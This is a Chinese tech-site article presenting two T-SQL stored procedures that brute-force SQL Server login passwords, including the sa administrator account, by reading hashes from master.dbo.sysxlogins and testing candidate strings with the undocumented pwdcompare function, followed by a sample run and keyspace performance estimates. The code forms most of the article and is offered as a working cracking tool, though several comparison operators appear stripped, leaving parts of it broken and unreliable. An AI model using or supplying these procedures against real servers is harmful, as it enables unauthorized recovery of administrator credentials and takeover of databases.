主頁 > 知識庫 > mssql使用存儲過程破解sa密碼

mssql使用存儲過程破解sa密碼

熱門標簽:云南全自動外呼系統(tǒng)公司 貴州外呼回撥系統(tǒng)是什么 智能外呼系統(tǒng)需要多少錢 智能語音車載電話機器人 衛(wèi)星地圖標注距離 外呼系統(tǒng)的話術 陽光創(chuàng)信ai外呼獲客系統(tǒng)助力 競圣地圖標注服務 安陽天音防封電銷卡

代碼演示暴力破解MSSQL的帳號和密碼,包括管理員帳號sa的密碼。

網(wǎng)上有SQL Server Sa密碼破解的存儲過程,方法就是暴力破解MSSQL的帳號和密碼,包括管理員帳號sa的密碼,下面我對其它的代碼稍做修改,并進行了一些性能分析。

首先說說破解過程序核心思想,就是存儲帳號密碼的master.dbo.sysxlogins表和未公布的密碼比較存儲過程pwdcompare。經(jīng)過一方分析,修改了部分代碼,下面貼出修改前后的代碼,

一個SQL Server Sa密碼破解的存儲過程

復制代碼 代碼如下:

alter proc p_GetPassword
    @username sysname=null, --用戶名,如果不指定,則列出所有用戶
    @pwdlen int=2 --要破解的密碼的位數(shù),默認是2位及以下的
as
    set @pwdlen=case when isnull(@pwdlen,0)1 then 1 else @pwdlen-1 end
    select top 255 id=identity(int,0,1) into #t from syscolumns
    alter table #t add constraint PK_#t primary key(id)
    select name,password
        ,type=case when xstatus2048=2048 then 1 else 0 end
        ,jm=case when password is null then 1 else 0 end
        ,pwdstr=cast('' as sysname)
        ,pwd=cast('' as varchar(8000))
        into #pwd
    from master.dbo.sysxlogins a
    where srvid is null
        and name=isnull(@username,name)
    declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)
    declare @l int
    select @l=0
        ,@s1='char(aa.id)'
        ,@s2='cast(aa.id as varchar)'
        ,@s3=',#t aa'
    exec('
        update pwd set jm=1,pwdstr='+@s1+'
        ,pwd='+@s2+'
        from #pwd pwd'+@s3+'
        where pwd.jm=0
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1
        ')
    while exists(select 1 from #pwd where jm=0 and @l@pwdlen)
    begin
        select @l=@l+1
        ,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'
        ,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'
        ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
        exec('
        update pwd set jm=1,pwdstr='+@s1+'
        ,pwd='+@s2+'
        from #pwd pwd'+@s3+'
        where pwd.jm=0
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1
        ')
    end
    select 用戶名=name,密碼=pwdstr,密碼ASCII=pwd
    from #pwd
GO

 下面是我修改后的代碼:

復制代碼 代碼如下:

alter proc p_GetPassword2
    @username sysname=null, --用戶名,如果不指定,則列出所有用戶
    @pwdlen int=2 --要破解的密碼的位數(shù),默認是2位及以下的
as
    set nocount on

    if object_id(N'tempdb..#t') is not null
        drop table #t
    if object_id(N'tempdb..#pwd') is not null
        drop table #pwd

    set @pwdlen=case when isnull(@pwdlen,0)1 then 1 else @pwdlen-1 end

    declare @ss varchar(256)
    --select @ss= '123456789'
    select @ss=    'abcdefghijklmnopqrstuvwxyz'
    select @ss=@ss+ '`0123456789-=[]\;,./'
    select @ss=@ss+ '~!@#$%^*()_+{}|:>?'
    --select @ss=@ss+    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'

    create table #t(c char(1) not null)
    alter table #t add constraint PK_#t primary key CLUSTERED (c)
    declare @index int
    select @index=1
    while (@index =len(@ss))
    begin
        insert #t select SUBSTRING(@ss, @index, 1)
        select @index = @index +1
    end

    select name,password
        ,type=case when xstatus2048=2048 then 1 else 0 end
        ,jm=case when password is null then 1 else 0 end
        ,pwdstr=cast('' as sysname)
        ,pwd=cast('' as varchar(8000))
        ,times =cast('' as varchar(8000))
        into #pwd
    from master.dbo.sysxlogins a
    where srvid is null
        and name=isnull(@username,name)
    declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000), @stimes varchar(8000)

    declare @l int, @t bigint

    select @t = count(1)*POWER(len(@ss),1) from #pwd

    select @l=0
        ,@s1='aa.c'
        ,@s2='cast(ASCII(aa.c) as varchar)'
        ,@s3=',#t aa'
        ,@stimes='1th,' + cast(@t as varchar(20)) + 'rows'

    exec('
        update pwd set jm=1,pwdstr='+@s1+'
        ,pwd='+@s2+'
        from #pwd pwd'+@s3+'
        where pwd.jm=0
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1
        ')
    while exists(select 1 from #pwd where jm=0 and @l@pwdlen)
    begin
        select @l=@l+1
        select @t = count(1)*POWER(len(@ss),@l+1) from #pwd
        print @t

        select
        @s1=@s1+'+'+char(@l/26+97)+char(@l%26+97)+'.c'
        ,@s2=@s2+'+'',''+cast(ASCII('+char(@l/26+97)+char(@l%26+97)+'.c) as varchar)'
        ,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)
        ,@stimes=@stimes+';'+ cast(@l+1 as varchar(1)) + 'th,' + cast(@t as varchar(20)) + 'rows'

        exec('
        update pwd set jm=1,pwdstr='+@s1+'
        ,pwd='+@s2+'
        ,times='''+@stimes+'''
        from #pwd pwd'+@s3+'
        where pwd.jm=0
        and pwdcompare('+@s1+',pwd.password,pwd.type)=1
        ')
    end
    select 用戶名=name,密碼=pwdstr,密碼ASCII=pwd, 查詢次數(shù)和行數(shù)=times
    from #pwd

    if object_id(N'tempdb..#t') is not null
        drop table #t
    if object_id(N'tempdb..#pwd') is not null
        drop table #pwd

我測試如下

復制代碼 代碼如下:

p_GetPassword2 'b', 6

用戶名 密碼 密碼ASCII 查詢次數(shù)和行數(shù)
b 123 49,50,51 1th,66rows;2th,4356rows;3th,287496rows
 

性能分析:

本例以一個查詢能查詢bigint的最大值條記錄9223372036854775807為限做為主機最大性能,來粗略計算破解性能。

破解一個帳號的密碼長度,破解時間和性能消耗,是以所有用于破解的字符長度為底,以密碼長度為指數(shù)的指數(shù)函數(shù),即:破解帳號個數(shù) * (所有用于破解的字符個數(shù))最長密碼長度次方 主機最大性能:

原存儲過程使用256個破解字符,理論上可以破解7位密碼,即2567Max(bigint)。
我修改的存儲過程使用66個鍵盤常規(guī)字符,理論上可以破解10位密碼,即6610Max(bigint)。
如果知道密碼是10個數(shù)字字符的組合,理論上可以破解19位密碼,即1019Max(bigint)。

您可能感興趣的文章:
  • MSSQL監(jiān)控數(shù)據(jù)庫的DDL操作(創(chuàng)建,修改,刪除存儲過程,創(chuàng)建,修改,刪除表等)
  • PHP得到mssql的存儲過程的輸出參數(shù)功能實現(xiàn)
  • MSSQL MySQL 數(shù)據(jù)庫分頁(存儲過程)
  • mssql存儲過程表名和字段名為變量的實現(xiàn)方法
  • MSSQL存儲過程學習筆記一 關于存儲過程
  • 實例學習mssql存儲過程分析
  • MySQL 存儲過程中執(zhí)行動態(tài)SQL語句的方法
  • sql存儲過程詳解
  • sqlserver存儲過程語法詳解
  • MSSQL事務的存儲過程

標簽:湘潭 寧夏 河源 欽州 營口 預約服務 鄂爾多斯 周口

巨人網(wǎng)絡通訊聲明:本文標題《mssql使用存儲過程破解sa密碼》,本文關鍵詞  mssql,使用,存儲,過程,破解,;如發(fā)現(xiàn)本文內(nèi)容存在版權問題,煩請?zhí)峁┫嚓P信息告之我們,我們將及時溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《mssql使用存儲過程破解sa密碼》相關的同類信息!
  • 本頁收集關于mssql使用存儲過程破解sa密碼的相關信息資訊供網(wǎng)民參考!
  • 推薦文章